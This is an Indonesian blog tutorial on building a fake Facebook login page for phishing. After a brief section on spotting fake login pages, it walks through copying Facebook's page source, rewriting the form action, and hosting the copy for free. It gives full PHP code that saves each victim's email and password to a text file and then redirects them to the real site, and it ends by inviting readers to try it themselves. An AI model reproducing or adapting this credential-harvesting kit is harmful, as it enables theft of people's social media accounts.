Tutorial Membuat Fake Facebok Atau Phising FB

Fake login atau login palsu mungkin sudah sering kita dengar namun tak sedikit pula yang mengetahui apa fungsinya, bagaimana cara menghindarinya bahkan bagaimana cara membuatnya. Nah, di sini saya akan sedikit mencoba menjelaskan apa fungsinya, cara menghindarinya dan cara membuatnya. Fungsi dari fake login ini adalah untuk mengetahui username dan password target yang ditentukan. Umumnya fake login ini menggunakan sistem social engineering.

Nah, apakah anda tau apakah social engineeringbingung social engineering adalah istilah untuk meminta username dan password ke pemiliknya secara langsung namun pemilik tersebut tidak sadar. Nah, jika kita sudah mengetahui username dan password tersebut, kita pastinya akan bisa mengutak-atik id tersebut. Nah, dalam kasus ini yang akan saya contohkan adalah login pada jejaring sosial facebook.com.

Kali ini saya akan memberitahukan bagaimana cara menghindari fake login pada facebook.com. Sebelumnya, saya akan memberikan dua gambar yang sama, namun secara teliti sangat berbeda.


Palsu


Asli


Palsu












Antara gambar kiri dan kanan nampak sama namun ada suatu perbedaan yang tidak diketahui oleh banyak orang. Sebagai bukti, coba anda klik gambar kiri dan kanan (asli dan palsu). Setelah itu, lihat yang saya lingkari. Jelas bukan perbedaanya? Yang asli adalah website resmi facebook.com sedangkan yang palsu bukan. Nah, jika kita lengah terhadap website palsu tersebut, bisa jadi kita menuliskan user dan password milik kita yang nantinya akan disimpan dalam file lain. Nah, hal tersebut dinamakan social engineering. Dan untuk menghindarinya, selalu waspada serta kenali alamat website tujuan kita.

Nah, pada bagian akhir ini saya akan menjelaskan bagaimana cara membuat fake login itu. Contoh kali ini tetap menggunakan alamat http://www.facebook.com. Kita juga menggunakan bahasa PHP, fungsi PHP fopen, fwrite, fclose. Dan yang paling penting, kita harus mempunyai lokasi penyimpanan (hosting) guna meletakkan file yang akan digunakan dan dapat diakses secara global. Hostingan yang dapat digunakan dan gratis adalah http://www.byethost.com.

Setelah semuanya sudah tersedia, langsung saja kita bahas cara membuat fake login tersebut.
  1. Buka alamat http://www.facebook.com lalu klik kanan pada halaman tersebut dan pilih view page source (untuk pengguna mozilla Firefox). Yang fungsinya untuk melihat kode halaman itu. Setelah itu, simpan dengan extensi php (ex:home.php) dan letakkan pada server lokal (localhost) dahulu agar mudah untuk mencoba dalam pembuatan.
  2. Buka file tersebut menggunakan text editor (ex:notepad/wordpad) dan cari coding berikut ini https://login.facebook.com/login.php?login_attempt=1 dan gantilah dengan login.php lalu simpan lagi file tersebut.
  3. Kita akan membuat file login.php. Buka text editor dan ketik coding berikut ini.
    <?php
    $file = "hasil.txt";
    $a= fopen($file, 'a+') or die("can't open file");
    $text = "$_POST[email] -> $_POST[pass]\r\n";
    $write=fwrite($a, $text);
    fclose($a);

    echo"<script language=javascript>window.location='http://www.facebook.com'</script>";

    ?>
    • $file = "hasil.txt";
      Penamaan variabel untuk membuat file beserta extensi-nya. Pada kasus ini akan membuat nama file hasil dengan extensi *.txt dan akan menjadi hasil.txt.
    • $a= fopen($file, 'a+') or die("can't open file");
      Fungsi fopen yang berguna untuk membuka suatu file untuk lebih jelasnya silahkan membaca http://php.net/manual/en/function.fopen.php.
    • $text = "$_POST[email] -> $_POST[pass]\r\n";
      Mengambil suatu nilai yang dikirmkan melalui file home.php
    • $write=fwrite($a, $text);
      Berfungsi untuk melakukan proses variabel $a dan kemudian menuliskan proses variabel $text.
    • fclose($a);
      Menutup atau mengakhiri proses fopen.
    • echo"<script language=javascript>window.location='http://www.facebook.com'</script>";
      Setelah selesai, halaman langsung dialihkan ke alamat website yang sebenarnya, yakni http://www.facebook.com
  4. Membuat fake login selesai.
Cara kerja dari fake login di atas adalah ketika target membuka home.php pada browser dan secara tidak sengaja menuliskan username dan password dan menekan tombol login, maka tampilan akan ditujukan ke login.php. Pada file login.php, terdapat proses untuk memeriksa file dan menulis. Jika file hasil.txt tersebut tidak ada, maka akan dibuat secara automatis. Dan menuliskan hasil ketikan target yang berisi username serta password ke dalam file hasil.txt.

Nah, mudah bukan untuk membuat fake login sederhana? sekarang giliran anda untuk mencoba tepuk tangan


Comments

Popular posts from this blog

Pengertian dari BitCoin Dan Cara Mendapatkan BitCoin Dengan Gratis

Script Lagu Untuk Blog